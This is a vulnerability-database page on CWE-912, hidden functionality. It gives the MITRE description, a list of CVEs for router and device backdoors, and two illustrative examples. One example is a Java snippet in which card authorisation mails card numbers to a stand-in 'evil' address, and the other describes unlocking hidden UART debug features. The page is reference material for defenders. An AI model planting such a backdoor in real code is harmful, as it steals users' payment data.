Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CWE-912 (隐藏功能) — Vulnerability Class 69

69 vulnerabilities classified as CWE-912 (隐藏功能). AI Chinese analysis included.

CWE-912 represents a software weakness where undocumented, unspecified, or non-obvious functionality exists within a product, often bypassing standard user interfaces or administrative controls. This vulnerability is typically exploited by attackers who discover these hidden pathways, such as debug ports, developer shortcuts, or intentional backdoors, to gain unauthorized access or execute malicious actions without detection. Developers can mitigate this risk by enforcing strict code reviews to identify and remove unnecessary or obscure code paths, ensuring comprehensive documentation of all features, and implementing rigorous access controls that restrict visibility to only intended, documented interfaces. By adhering to secure coding standards and maintaining clear separation between production and development code, organizations can eliminate unintended entry points, thereby reducing the attack surface and preventing adversaries from leveraging hidden mechanisms for unauthorized system manipulation or data exfiltration.

MITRE CWE Description
The product contains functionality that is not documented, not part of the specification, and not accessible through an interface or command sequence that is obvious to the product's users or administrators. Hidden functionality can take many forms, such as intentionally malicious code, "Easter Eggs" that contain extraneous functionality such as games, developer-friendly shortcuts that reduce maintenance or support costs such as hard-coded accounts, etc. From a security perspective, even when the functionality is not intentionally malicious or damaging, it can increase the product's attack surface and expose additional weaknesses beyond what is already exposed by the intended functionality. Even if it is not easily accessible, the hidden functionality could be useful for attacks that modify the control flow of the application.
Common Consequences (1)
Other, IntegrityVaries by Context, Alter Execution Logic
Mitigations (1)
InstallationAlways verify the integrity of the product that is being installed.
Examples (2)
In the example below, a malicous developer has injected code to send credit card numbers to the developer's own email address.
boolean authorizeCard(String ccn) { // Authorize credit card. ... mailCardNumber(ccn, "evil_developer@evil_domain.com"); }
Bad · Java
Consider a device that comes with various security measures, such as secure boot. The secure-boot process performs firmware-integrity verification at boot time, and this code is stored in a separate SPI-flash device. However, this code contains undocumented "special access features" intended to be used only for performing failure analysis and intended to only be unlocked by the device designer.
Attackers dump the code from the device and then perform reverse engineering to analyze the code. The undocumented, special-access features are identified, and attackers can activate them by sending specific commands via UART before secure-boot phase completes. Using these hidden features, attackers can perform reads and writes to memory via the UART interface. At runtime, the attackers can also execute arbitrary code and dump the entire memory contents.
Bad · Other
CVE IDTitleCVSSSeverityPublished
CVE-2025-0675 Elber Communications Equipment Hidden Functionality — Signum DVB-S/S2 IRD 7.5 High2025-02-06
CVE-2025-0626 Hidden Functionality vulnerability in Contec Health CMS8000 Patient Monitor — CMS8000 Patient Monitor 7.5 High2025-01-30
CVE-2024-39754 WAVLINK AC3000 安全漏洞 — Wavlink AC3000 10.0 Critical2025-01-14
CVE-2024-13062 ASUS AiCloud 安全漏洞 — Router 7.2 High2025-01-02
CVE-2024-10773 SICK InspectorP61x, SICK InspectorP62x and SICK TiM3xx are vulnerable for pass-the-hash attacks — SICK InspectorP61x 9.0 Critical2024-12-06
CVE-2024-45697 D-Link WiFi router - Hidden Functionality — DIR-X4860 A1 9.8 Critical2024-09-16
CVE-2024-45696 D-Link WiFi router - Hidden Functionality — DIR-X4860 A1 8.8 High2024-09-16
CVE-2024-37994 Siemens SIMATIC 安全漏洞 — SIMATIC Reader RF610R CMIIT 4.3 Medium2024-09-10
CVE-2024-37990 Siemens SIMATIC 安全漏洞 — SIMATIC Reader RF610R CMIIT 6.5 Medium2024-09-10
CVE-2024-20439 Cisco Smart Licensing Utility 安全漏洞 — Cisco Smart License Utility 9.8 Critical2024-09-04
CVE-2024-5633 Longse LBH30FE200W 安全漏洞 — LBH30FE200W 8.8AIHighAI2024-07-09
CVE-2024-6045 D-Link router - Hidden Backdoor — G403 8.8 High2024-06-17
CVE-2024-33583 Siemens 多款产品 安全漏洞 — SIMATIC RTLS Locating Manager 3.3 Low2024-05-14
CVE-2024-3016 NEC Platforms DT900 Series 安全漏洞 — ITK-6DGS-1(BK) TEL 6.5 -2024-05-09
CVE-2024-28011 NEC Corporation Aterm 安全漏洞 — WG1800HP4 8.1AIHighAI2024-03-28
CVE-2024-22044 Siemens SENTRON 3KC ATC6 Expansion Module Ethernet 安全漏洞 — SENTRON 3KC ATC6 Expansion Module Ethernet 7.5 High2024-03-12
CVE-2023-42134 PAX Technology A920 安全漏洞 — POS terminals 6.8 Medium2024-01-15
CVE-2023-4467 Poly Trio 8800 Test Automation Mode backdoor — Trio 8800 6.2 Medium2023-12-29
CVE-2023-6614 Typecho Page manage-pages.php backdoor — Typecho 2.7 Low2023-12-08
CVE-2023-25183 Snap One OvrC Pro 安全漏洞 — OvrC Cloud 8.3 High2023-05-22
CVE-2022-38452 NETGEAR RBR750 安全漏洞 — Orbi Router RBR750 7.2 High2023-03-21
CVE-2022-36429 NETGEAR Orbi Satellite RBS750 安全漏洞 — Orbi Satellite RBS750 7.2 High2023-03-21
CVE-2021-36403 Moodle 输入验证错误漏洞 — Moodle 4.3 -2023-03-06
CVE-2022-3843 WAGO: Exposure of configuration interface in unmanaged switches — Unmanaged Switch 852-111/000-001 9.1 Critical2023-02-16
CVE-2022-3203 ORing net IAP-420(+) Hidden Functionality — IAP-420(+) 9.8 Critical2022-10-21
CVE-2022-1741 2.2.3 HIDDEN FUNCTIONALITY CWE-912 — ImageCast X application 6.8 -2022-06-24
CVE-2017-20084 JUNG Smart Visu Server KNX Group Address backdoor — Smart Visu Server 5.3 Medium2022-06-22
CVE-2017-20083 JUNG Smart Visu Server SSH Server backdoor — Smart Visu Server 5.3 Medium2022-06-22
CVE-2017-20082 JUNG Smart Visu Server backdoor — Smart Visu Server 5.5 Medium2022-06-22
CVE-2021-4229 ua-parser-js Crypto Mining backdoor — ua-parser-js 5.0 Medium2022-05-24

Vulnerabilities classified as CWE-912 (隐藏功能) represent 69 CVEs. The CWE taxonomy describes the weakness; review individual CVEs for product-specific impact.